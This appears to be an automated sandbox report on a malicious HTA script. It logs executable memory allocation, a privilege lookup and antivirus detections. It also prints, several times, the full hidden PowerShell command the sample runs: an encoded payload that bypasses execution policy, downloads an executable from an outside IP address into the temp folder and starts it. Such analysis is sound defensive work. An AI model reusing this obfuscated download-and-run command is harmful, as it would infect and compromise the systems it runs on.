NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02546000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02547000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02548000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02549000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a31000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a33000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a34000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a35000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a36000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a37000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a38000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a39000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a3a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a3b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a3c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a3d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a3e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a3f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a41000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a43000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 8, 2023, 1:59 p.m.	process_identifier: 2088 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a44000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	"C:\Windows\System32\WINdOWSpoWERsHEll\v1.0\PoWershelL.EXE" "pOwERshELL -ex byPaSS -NOp -w 1 -ec IAAgAFsATgBlAHQALgBTAEUAUgB2AGkAYwBlAFAAbwBJAE4AVABtAGEATgBhAEcARQByAF0AOgA6AFMAZQBDAHUAUgBpAHQAWQBwAFIAbwBUAG8AQwBvAGwAIAAgAAkACQAgACAAPQAgACAAWwBOAEUAdAAuAHMARQBjAHUAcgBJAFQAWQBwAHIATwB0AE8AQwBvAGwAVABZAFAAZQBdADoAOgBUAGwAcwAxADIAIAAJACAAIAA7ACAAIAAJACAACQAJAAkACQAJACAACQAgACAAIAAgACAAIAAgAHcARwBFAFQAIAAgACAAIAAoAB0gaAB0AHQAcAA6AC8ALwAyADMALgA5ADQALgAyADMANgAuADIAMAAzAC8ANwAzADAALwBJAEIATQBfAGMAHSAgACAACQAJAAkACQAgAAkAIAAJACAACQAgACAACQAgACAACQAJAAkACQAgAAkAIAAJACAACQAgACAACQArACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJAB0gZQAdICAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACsAIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAHSBuAHQAcwAuAGUAeAAdICAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACsAIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAHSBlAB0gIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAKQAgACAACQAJAAkAIAAgAC0AbwB1AHQAZgBJAEwAZQAgAAkACQAJAAkACQAJAAkAHSAkAEUAbgBWADoAdABlAE0AUABcAEkAQgBNAF8AQwBlAG4AdABvAHMAcwAuAGUAeABlAB0gIAAgACAAIAAgACAAIAAgADsAIAAJAAkACQAJAAkACQAJAAkACQBTAFQAQQByAHQAIAAgACAAIAAgACAAHSAkAEUATgBWADoAdABFAG0AcABcAEkAQgBNAF8AQwBlAG4AdABvAHMAcwAuAGUAeABlAB0g "
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex byPaSS -NOp -w 1 -ec IAAgAFsATgBlAHQALgBTAEUAUgB2AGkAYwBlAFAAbwBJAE4AVABtAGEATgBhAEcARQByAF0AOgA6AFMAZQBDAHUAUgBpAHQAWQBwAFIAbwBUAG8AQwBvAGwAIAAgAAkACQAgACAAPQAgACAAWwBOAEUAdAAuAHMARQBjAHUAcgBJAFQAWQBwAHIATwB0AE8AQwBvAGwAVABZAFAAZQBdADoAOgBUAGwAcwAxADIAIAAJACAAIAA7ACAAIAAJACAACQAJAAkACQAJACAACQAgACAAIAAgACAAIAAgAHcARwBFAFQAIAAgACAAIAAoAB0gaAB0AHQAcAA6AC8ALwAyADMALgA5ADQALgAyADMANgAuADIAMAAzAC8ANwAzADAALwBJAEIATQBfAGMAHSAgACAACQAJAAkACQAgAAkAIAAJACAACQAgACAACQAgACAACQAJAAkACQAgAAkAIAAJACAACQAgACAACQArACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJAB0gZQAdICAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACsAIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAHSBuAHQAcwAuAGUAeAAdICAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACsAIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAHSBlAB0gIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAKQAgACAACQAJAAkAIAAgAC0AbwB1AHQAZgBJAEwAZQAgAAkACQAJAAkACQAJAAkAHSAkAEUAbgBWADoAdABlAE0AUABcAEkAQgBNAF8AQwBlAG4AdABvAHMAcwAuAGUAeABlAB0gIAAgACAAIAAgACAAIAAgADsAIAAJAAkACQAJAAkACQAJAAkACQBTAFQAQQByAHQAIAAgACAAIAAgACAAHSAkAEUATgBWADoAdABFAG0AcABcAEkAQgBNAF8AQwBlAG4AdABvAHMAcwAuAGUAeABlAB0g
cmdline	C:\Windows\System32\WINdOWSpoWERsHEll\v1.0\PoWershelL.EXE "pOwERshELL -ex byPaSS -NOp -w 1 -ec IAAgAFsATgBlAHQALgBTAEUAUgB2AGkAYwBlAFAAbwBJAE4AVABtAGEATgBhAEcARQByAF0AOgA6AFMAZQBDAHUAUgBpAHQAWQBwAFIAbwBUAG8AQwBvAGwAIAAgAAkACQAgACAAPQAgACAAWwBOAEUAdAAuAHMARQBjAHUAcgBJAFQAWQBwAHIATwB0AE8AQwBvAGwAVABZAFAAZQBdADoAOgBUAGwAcwAxADIAIAAJACAAIAA7ACAAIAAJACAACQAJAAkACQAJACAACQAgACAAIAAgACAAIAAgAHcARwBFAFQAIAAgACAAIAAoAB0gaAB0AHQAcAA6AC8ALwAyADMALgA5ADQALgAyADMANgAuADIAMAAzAC8ANwAzADAALwBJAEIATQBfAGMAHSAgACAACQAJAAkACQAgAAkAIAAJACAACQAgACAACQAgACAACQAJAAkACQAgAAkAIAAJACAACQAgACAACQArACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJAB0gZQAdICAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACsAIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAHSBuAHQAcwAuAGUAeAAdICAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACsAIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAHSBlAB0gIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAKQAgACAACQAJAAkAIAAgAC0AbwB1AHQAZgBJAEwAZQAgAAkACQAJAAkACQAJAAkAHSAkAEUAbgBWADoAdABlAE0AUABcAEkAQgBNAF8AQwBlAG4AdABvAHMAcwAuAGUAeABlAB0gIAAgACAAIAAgACAAIAAgADsAIAAJAAkACQAJAAkACQAJAAkACQBTAFQAQQByAHQAIAAgACAAIAAgACAAHSAkAEUATgBWADoAdABFAG0AcABcAEkAQgBNAF8AQwBlAG4AdABvAHMAcwAuAGUAeABlAB0g "

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW July 8, 2023, 1:59 p.m.	show_type: 0 filepath_r: C:\Windows\System32\WINdOWSpoWERsHEll\v1.0\PoWershelL.EXE parameters: "pOwERshELL -ex byPaSS -NOp -w 1 -ec IAAgAFsATgBlAHQALgBTAEUAUgB2AGkAYwBlAFAAbwBJAE4AVABtAGEATgBhAEcARQByAF0AOgA6AFMAZQBDAHUAUgBpAHQAWQBwAFIAbwBUAG8AQwBvAGwAIAAgAAkACQAgACAAPQAgACAAWwBOAEUAdAAuAHMARQBjAHUAcgBJAFQAWQBwAHIATwB0AE8AQwBvAGwAVABZAFAAZQBdADoAOgBUAGwAcwAxADIAIAAJACAAIAA7ACAAIAAJACAACQAJAAkACQAJACAACQAgACAAIAAgACAAIAAgAHcARwBFAFQAIAAgACAAIAAoAB0gaAB0AHQAcAA6AC8ALwAyADMALgA5ADQALgAyADMANgAuADIAMAAzAC8ANwAzADAALwBJAEIATQBfAGMAHSAgACAACQAJAAkACQAgAAkAIAAJACAACQAgACAACQAgACAACQAJAAkACQAgAAkAIAAJACAACQAgACAACQArACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJAB0gZQAdICAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACsAIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAHSBuAHQAcwAuAGUAeAAdICAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACsAIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAHSBlAB0gIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAKQAgACAACQAJAAkAIAAgAC0AbwB1AHQAZgBJAEwAZQAgAAkACQAJAAkACQAJAAkAHSAkAEUAbgBWADoAdABlAE0AUABcAEkAQgBNAF8AQwBlAG4AdABvAHMAcwAuAGUAeABlAB0gIAAgACAAIAAgACAAIAAgADsAIAAJAAkACQAJAAkACQAJAAkACQBTAFQAQQByAHQAIAAgACAAIAAgACAAHSAkAEUATgBWADoAdABFAG0AcABcAEkAQgBNAF8AQwBlAG4AdABvAHMAcwAuAGUAeABlAB0g " filepath: C:\Windows\System32\WINdOWSpoWERsHEll\v1.0\PoWershelL.EXE	1	1	0

File has been identified by 6 AntiVirus engines on VirusTotal as malicious (6 events)

Symantec	ISB.Downloader!gen80
Kaspersky	HEUR:Trojan-Downloader.Script.Generic
NANO-Antivirus	Trojan.Script.Vbs-heuristic.druvzi
ZoneAlarm	HEUR:Trojan-Downloader.Script.Generic
Rising	Downloader.Agent/PS!8.1250D (TOPIS:E0:Yf0HoGX0oaL)
Fortinet	VBS/Agent.FVB!tr

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 8, 2023, 1:59 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW July 8, 2023, 1:59 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

One or more non-whitelisted processes were created (2 events)

parent_process	powershell.exe				martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex byPaSS -NOp -w 1 -ec IAAgAFsATgBlAHQALgBTAEUAUgB2AGkAYwBlAFAAbwBJAE4AVABtAGEATgBhAEcARQByAF0AOgA6AFMAZQBDAHUAUgBpAHQAWQBwAFIAbwBUAG8AQwBvAGwAIAAgAAkACQAgACAAPQAgACAAWwBOAEUAdAAuAHMARQBjAHUAcgBJAFQAWQBwAHIATwB0AE8AQwBvAGwAVABZAFAAZQBdADoAOgBUAGwAcwAxADIAIAAJACAAIAA7ACAAIAAJACAACQAJAAkACQAJACAACQAgACAAIAAgACAAIAAgAHcARwBFAFQAIAAgACAAIAAoAB0gaAB0AHQAcAA6AC8ALwAyADMALgA5ADQALgAyADMANgAuADIAMAAzAC8ANwAzADAALwBJAEIATQBfAGMAHSAgACAACQAJAAkACQAgAAkAIAAJACAACQAgACAACQAgACAACQAJAAkACQAgAAkAIAAJACAACQAgACAACQArACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJAB0gZQAdICAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACsAIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAHSBuAHQAcwAuAGUAeAAdICAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACAAIAAJAAkACQAJACAACQAgAAkAIAAJACAAIAAJACsAIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAHSBlAB0gIAAgAAkACQAJAAkAIAAJACAACQAgAAkAIAAgAAkAKQAgACAACQAJAAkAIAAgAC0AbwB1AHQAZgBJAEwAZQAgAAkACQAJAAkACQAJAAkAHSAkAEUAbgBWADoAdABlAE0AUABcAEkAQgBNAF8AQwBlAG4AdABvAHMAcwAuAGUAeABlAB0gIAAgACAAIAAgACAAIAAgADsAIAAJAAkACQAJAAkACQAJAAkACQBTAFQAQQByAHQAIAAgACAAIAAgACAAHSAkAEUATgBWADoAdABFAG0AcABcAEkAQgBNAF8AQwBlAG4AdABvAHMAcwAuAGUAeABlAB0g
parent_process	powershell.exe				martian_process	C:\Users\test22\AppData\Local\Temp\IBM_Centoss.exe

Creates a suspicious Powershell process (6 events)

option	-ex bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-ex bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-ex bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile

The process powershell.exe wrote an executable file to disk (1 event)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

IE_NET.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All